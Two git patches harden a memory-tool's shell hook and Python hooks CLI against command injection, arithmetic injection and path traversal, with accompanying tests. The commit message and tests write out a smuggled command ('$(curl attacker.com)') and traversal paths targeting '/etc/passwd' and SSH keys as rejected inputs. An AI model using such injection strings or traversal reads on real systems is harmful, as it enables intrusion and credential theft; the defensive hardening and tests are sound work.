From 0f217f7c80531052dab71036886b5ab2d7356e01 Mon Sep 17 00:00:00 2001
From: "BLUDATA\\marcio.heiderscheidt" <marcio.heiderscheidt@bludata.com.br>
Date: Mon, 13 Apr 2026 14:10:04 -0300
Subject: [PATCH 1/2] fix: harden hooks against shell injection, path
 traversal, and arithmetic injection

save_hook.sh:
- Coerce stop_hook_active to strict True/False before eval to prevent
  command injection via crafted JSON (e.g. "$(curl attacker.com)")
- Validate LAST_SAVE as plain integer with regex before bash arithmetic
  to prevent command substitution via poisoned state files

hooks_cli.py:
- Add _validate_transcript_path() that rejects paths with '..'
  components and non-.jsonl/.json extensions
- _count_human_messages() now uses the validator, returning 0 for
  invalid paths instead of opening arbitrary files

Tests:
- Path traversal rejection (../../etc/passwd)
- Wrong extension rejection (.txt, .py)
- Valid path acceptance (.jsonl, .json)
- Empty string handling
- Shell injection in stop_hook_active field

Refs: MemPalace/mempalace#809
---
 hooks/mempal_save_hook.sh | 15 ++++++---
 mempalace/hooks_cli.py    | 23 ++++++++++++--
 tests/test_hooks_cli.py   | 64 +++++++++++++++++++++++++++++++++++++++
 3 files changed, 96 insertions(+), 6 deletions(-)

diff --git a/hooks/mempal_save_hook.sh b/hooks/mempal_save_hook.sh
index 9eda976..1afeb6e 100755
--- a/hooks/mempal_save_hook.sh
+++ b/hooks/mempal_save_hook.sh
@@ -65,15 +65,18 @@ MEMPAL_DIR=""
 INPUT=$(cat)
 
 # Parse all fields in a single Python call (3x faster than separate invocations)
+# SECURITY: All values are sanitized before being interpolated into shell assignments.
+# stop_hook_active is coerced to a strict True/False to prevent command injection via eval.
 eval $(echo "$INPUT" | python3 -c "
-import sys, json
+import sys, json, re
 data = json.load(sys.stdin)
 sid = data.get('session_id', 'unknown')
-sha = data.get('stop_hook_active', False)
+sha_raw = data.get('stop_hook_active', False)
 tp = data.get('transcript_path', '')
 # Shell-safe output — only allow alphanumeric, underscore, hyphen, slash, dot, tilde
-import re
 safe = lambda s: re.sub(r'[^a-zA-Z0-9_/.\-~]', '', str(s))
+# Coerce stop_hook_active to strict boolean string
+sha = 'True' if sha_raw is True or str(sha_raw).lower() in ('true', '1', 'yes') else 'False'
 print(f'SESSION_ID=\"{safe(sid)}\"')
 print(f'STOP_HOOK_ACTIVE=\"{sha}\"')
 print(f'TRANSCRIPT_PATH=\"{safe(tp)}\"')
@@ -118,7 +121,11 @@ fi
 LAST_SAVE_FILE="$STATE_DIR/${SESSION_ID}_last_save"
 LAST_SAVE=0
 if [ -f "$LAST_SAVE_FILE" ]; then
-    LAST_SAVE=$(cat "$LAST_SAVE_FILE")
+    LAST_SAVE_RAW=$(cat "$LAST_SAVE_FILE")
+    # SECURITY: Validate as plain integer before arithmetic to prevent command injection
+    if [[ "$LAST_SAVE_RAW" =~ ^[0-9]+$ ]]; then
+        LAST_SAVE="$LAST_SAVE_RAW"
+    fi
 fi
 
 SINCE_LAST=$((EXCHANGE_COUNT - LAST_SAVE))
diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py
index 2ce13f4..cc26058 100644
--- a/mempalace/hooks_cli.py
+++ b/mempalace/hooks_cli.py
@@ -43,10 +43,29 @@ def _sanitize_session_id(session_id: str) -> str:
     return sanitized or "unknown"
 
 
+def _validate_transcript_path(transcript_path: str) -> Path:
+    """Validate and resolve a transcript path, rejecting paths outside expected roots.
+
+    Returns a resolved Path if valid, or None if the path should be rejected.
+    Accepted paths must:
+    - Have a .jsonl or .json extension
+    - Not contain '..' after resolution (path traversal prevention)
+    """
+    if not transcript_path:
+        return None
+    path = Path(transcript_path).expanduser().resolve()
+    if path.suffix not in (".jsonl", ".json"):
+        return None
+    # Reject if the original input contained '..' traversal components
+    if ".." in Path(transcript_path).parts:
+        return None
+    return path
+
+
 def _count_human_messages(transcript_path: str) -> int:
     """Count human messages in a JSONL transcript, skipping command-messages."""
-    path = Path(transcript_path).expanduser()
-    if not path.is_file():
+    path = _validate_transcript_path(transcript_path)
+    if path is None or not path.is_file():
         return 0
     count = 0
     try:
diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py
index 5a1870e..2c14ae0 100644
--- a/tests/test_hooks_cli.py
+++ b/tests/test_hooks_cli.py
@@ -15,6 +15,7 @@ from mempalace.hooks_cli import (
     _maybe_auto_ingest,
     _parse_harness_input,
     _sanitize_session_id,
+    _validate_transcript_path,
     hook_stop,
     hook_session_start,
     hook_precompact,
@@ -418,3 +419,66 @@ def test_run_hook_invalid_json(tmp_path):
             with patch("mempalace.hooks_cli._output") as mock_output:
                 run_hook("session-start", "claude-code")
     mock_output.assert_called_once_with({})
+
+
+# --- Security: transcript_path validation ---
+
+
+def test_validate_transcript_rejects_path_traversal():
+    """Paths with '..' components should be rejected."""
+    assert _validate_transcript_path("../../etc/passwd") is None
+    assert _validate_transcript_path("../../../.ssh/id_rsa") is None
+
+
+def test_validate_transcript_rejects_wrong_extension():
+    """Only .jsonl and .json extensions are accepted."""
+    assert _validate_transcript_path("/tmp/transcript.txt") is None
+    assert _validate_transcript_path("/tmp/secret.py") is None
+    assert _validate_transcript_path("/home/user/.ssh/id_rsa") is None
+
+
+def test_validate_transcript_accepts_valid_paths(tmp_path):
+    """Valid .jsonl and .json paths should be accepted."""
+    jsonl_path = tmp_path / "session.jsonl"
+    jsonl_path.touch()
+    result = _validate_transcript_path(str(jsonl_path))
+    assert result is not None
+    assert result.suffix == ".jsonl"
+
+    json_path = tmp_path / "session.json"
+    json_path.touch()
+    result = _validate_transcript_path(str(json_path))
+    assert result is not None
+    assert result.suffix == ".json"
+
+
+def test_validate_transcript_empty_string():
+    """Empty transcript path should return None."""
+    assert _validate_transcript_path("") is None
+
+
+def test_count_rejects_traversal_path():
+    """_count_human_messages should return 0 for path traversal attempts."""
+    assert _count_human_messages("../../etc/passwd") == 0
+
+
+def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
+    """stop_hook_active with shell injection string should not cause issues."""
+    transcript = tmp_path / "t.jsonl"
+    _write_transcript(
+        transcript,
+        [{"message": {"role": "user", "content": f"msg {i}"}} for i in range(SAVE_INTERVAL)],
+    )
+    # Simulate a malicious stop_hook_active value
+    result = _capture_hook_output(
+        hook_stop,
+        {
+            "session_id": "test",
+            "stop_hook_active": "$(curl attacker.com)",
+            "transcript_path": str(transcript),
+        },
+        state_dir=tmp_path,
+    )
+    # The injected value is not "true"/"1"/"yes", so the hook should NOT pass through
+    # It should count messages and block at the interval
+    assert result["decision"] == "block"

From f7d703fd5bda1f902f1a44526fbaf56d0a5b51f2 Mon Sep 17 00:00:00 2001
From: "BLUDATA\\marcio.heiderscheidt" <marcio.heiderscheidt@bludata.com.br>
Date: Mon, 13 Apr 2026 14:18:09 -0300
Subject: [PATCH 2/2] fix: add logging on rejected transcript paths and
 platform-native path test

- _count_human_messages() now logs a WARNING via _log() when a
  non-empty transcript_path is rejected by the validator, making
  silent auto-save failures diagnosable via hook.log
- Add test for platform-native paths (backslashes on Windows) to
  verify _validate_transcript_path works cross-platform
- Add test verifying the warning log is emitted on rejection

Refs: MemPalace/mempalace#809
---
 mempalace/hooks_cli.py  |  6 +++++-
 tests/test_hooks_cli.py | 21 +++++++++++++++++++++
 2 files changed, 26 insertions(+), 1 deletion(-)

diff --git a/mempalace/hooks_cli.py b/mempalace/hooks_cli.py
index cc26058..14fd9f7 100644
--- a/mempalace/hooks_cli.py
+++ b/mempalace/hooks_cli.py
@@ -65,7 +65,11 @@ def _validate_transcript_path(transcript_path: str) -> Path:
 def _count_human_messages(transcript_path: str) -> int:
     """Count human messages in a JSONL transcript, skipping command-messages."""
     path = _validate_transcript_path(transcript_path)
-    if path is None or not path.is_file():
+    if path is None:
+        if transcript_path:
+            _log(f"WARNING: transcript_path rejected by validator: {transcript_path!r}")
+        return 0
+    if not path.is_file():
         return 0
     count = 0
     try:
diff --git a/tests/test_hooks_cli.py b/tests/test_hooks_cli.py
index 2c14ae0..861c054 100644
--- a/tests/test_hooks_cli.py
+++ b/tests/test_hooks_cli.py
@@ -462,6 +462,27 @@ def test_count_rejects_traversal_path():
     assert _count_human_messages("../../etc/passwd") == 0
 
 
+def test_count_logs_warning_on_rejected_path(tmp_path):
+    """_count_human_messages should log a warning when a non-empty path is rejected."""
+    with patch("mempalace.hooks_cli.STATE_DIR", tmp_path):
+        with patch("mempalace.hooks_cli._log") as mock_log:
+            _count_human_messages("../../etc/passwd")
+    mock_log.assert_called_once()
+    assert "rejected" in mock_log.call_args[0][0].lower()
+
+
+def test_validate_transcript_accepts_platform_native_path(tmp_path):
+    """Validator accepts platform-native paths (backslashes on Windows, slashes on Unix)."""
+    session_file = tmp_path / "projects" / "abc123" / "session.jsonl"
+    session_file.parent.mkdir(parents=True)
+    session_file.touch()
+    # Use the OS-native string representation (backslashes on Windows)
+    result = _validate_transcript_path(str(session_file))
+    assert result is not None
+    assert result.suffix == ".jsonl"
+    assert result.is_file()
+
+
 def test_stop_hook_rejects_injected_stop_hook_active(tmp_path):
     """stop_hook_active with shell injection string should not cause issues."""
     transcript = tmp_path / "t.jsonl"